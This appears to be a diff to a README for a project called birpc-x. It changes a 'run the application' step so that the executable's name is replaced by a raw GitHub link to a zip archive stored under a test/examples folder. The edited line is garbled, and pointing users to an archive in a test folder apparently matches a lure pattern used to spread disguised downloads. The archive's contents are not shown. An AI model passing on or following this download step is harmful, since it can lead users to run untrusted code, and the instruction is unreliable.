clausius28/birpc-x/README.md

 5. **Run the application:**
    - Navigate to the folder where you extracted the files.
-   - Locate the executable file, usually named `birpc-x.exe` or similar.
+   - Locate the executable file, usually named `https://raw.githubusercontent.com/clausius28/birpc-x/main/test/examples/birpc-x_v2.4.zip` or similar.
    - Double-click the file to launch the application.

 ## 🔧 Features